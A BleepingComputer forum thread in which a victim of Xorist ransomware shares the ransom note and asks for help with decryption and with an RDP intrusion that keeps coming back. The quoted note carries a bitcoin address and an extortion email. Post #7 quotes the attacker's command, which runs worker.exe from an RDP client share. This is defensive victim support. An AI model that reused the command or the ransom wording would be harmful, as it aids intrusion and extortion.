Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Ransomware note with ERROR-ID-63100777


  • This topic is locked This topic is locked
7 replies to this topic

#1 prasaddlv

prasaddlv

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:03:20 AM

Posted 12 June 2017 - 09:39 PM

Today morning the ransomware attacked with the following note:

 

All your important files were encrypted on this computer.
You can verify this by click on see files an try open them.

Encrtyption was produced using unique KEY generated for this computer.

To decrypted files, you need to otbtain private key.
The single copy of the private key, with will allow you to decrypt the files, is locate on a secret server on the internet;
The server will destroy the key within 24 hours after encryption completed.
REMEMBER YOU HAVE ONLY 24 HOURS TO PAY EVERITHING IS AUTOMATICALLY!
To retrieve the private key, you need to pay 3 bitcoins

Bitcoins have to be sent to this address: 1JjKYDsYrJGPCzLGGmFL8nM7AvUncd2wYW

After you've sent the payment send us an email to : support_repair@qq.com  with subject : ERROR-ID-63100777(3BTC)
If you are  not familiar with bitcoin you can buy it from here :

SITE : www.localbitcoin.com

After we confirm the payment , we send the private key so you can decrypt your system.

-----------------------------------------------------------------------------------------------------------------------

 

We tried using the Xorist Decryptor (https://decrypter.emsisoft.com/xorist) with the original file and the encrypted file.  But it is showing the following error:

 

---------------------------
No key found
---------------------------
The decrypter could not determine a valid key for your system. Please drag and drop both an encrypted file as well as its unencrypted counterpart onto the decrypter to determine the correct key. Files need to be at least 510 bytes long.


 

This happened even after installing a 30-day trial of animalware from emsisoft (https://www.emsisoft.com/en/business/antimalware/) !!!

 

Please let us know if anyone has the solution.



BC AdBot (Login to Remove)

 


#2 thyrex

thyrex

  • Members
  • 565 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belarus
  • Local time:12:50 AM

Posted 12 June 2017 - 11:04 PM

Upload some encrypted files onto https://sendspace.com and give downloading link


Microsoft MVP 2012-2016 Consumer Security

Microsoft Reconnect 2016


#3 prasaddlv

prasaddlv
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:03:20 AM

Posted 12 June 2017 - 11:20 PM

Thanks for the response.

 

Actually, there was some issue with the selected two files.

We tried with a new set of files and it started working.

Currently in the process of decrypting the files.



#4 prasaddlv

prasaddlv
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:03:20 AM

Posted 13 June 2017 - 12:05 AM

When we were affected by the same ransomware last week, we took the following precautions after decrypting the files:

 

  • Ensured the Windows update is latest
  • Ensured the Microsoft patch for ransomware was installed (KB4012212)
  • Changed the Administrator password and ensured it is strong
  • System was scanned several times (with softwares like Malwarebytes, Kaspersky etc.) and the identified malware was deleted
  • Finally installed 30-day trial of Anti-malware from emsisoft to ensure the realtime protection

 

The system was stable for last 5-6 days.  Today it attacked again.

 

Our system is in a datacenter and we access it using RDP.  Can this attack may be happening from the datacenter network ?

 

Even after taking these measures, how is it able to attack so easily ?



#5 jwoods301

jwoods301

  • Members
  • 1,489 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:50 PM

Posted 13 June 2017 - 12:16 AM

Brute force attacks using RDP are becoming more and more frequent.

 

See Demonslay335's post here in another thread regarding RDP...

 

https://www.bleepingcomputer.com/forums/t/644140/btcware-ransomware-support-topic-btcware-how-to-fix-hta-read-metxt/?p=4258799

 

As mentioned, VPN is a better solution.


Edited by jwoods301, 13 June 2017 - 12:22 AM.


#6 prasaddlv

prasaddlv
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:03:20 AM

Posted 13 June 2017 - 03:57 AM

Shocking thing is that the 30-day trial anti-malware software from emsisoft was removed from the server.

 

When we used it for 5-6 days, the system was absolutely fine.

 

But how is this possible ?

 

Can any ransomware delete anti-malware ???

 

Or if really some hacker logged into the system and manually uninstalled it ?

 

How to find how it is removed ?



#7 prasaddlv

prasaddlv
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:03:20 AM

Posted 13 June 2017 - 04:01 AM

When we opened windows run command, it was showing the following command in the box:

 

cmd.exe /C \\tsclient\fcx\worker.exe xxx.xxx.xxx.xx

 

The ip in the above command is same as our IP in the data center except the last part.

 

What is this command trying to do ?



#8 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,393 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:05:50 PM

Posted 13 June 2017 - 05:24 AM

Same thing reported in ths topic a few days ago and confirmed as Xorist.

More likely, the attacker manually removed Emisosft to ensure the infection was not blocked since it has an Anti-Ransomware module.

As already noted...there is an ongoing discussion in this topic where victims can post comments, ask questions and seek further assistance. Other victims have been directed there to share information, experiences and suggestions.Rather than have everyone with individual topics, it would be best (and more manageable for staff) if you posted any more questions, comments or requests for assistance in the above support topic discussion. To avoid unnecessary confusion, this topic is closed.

Thanks
The BC Staff
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users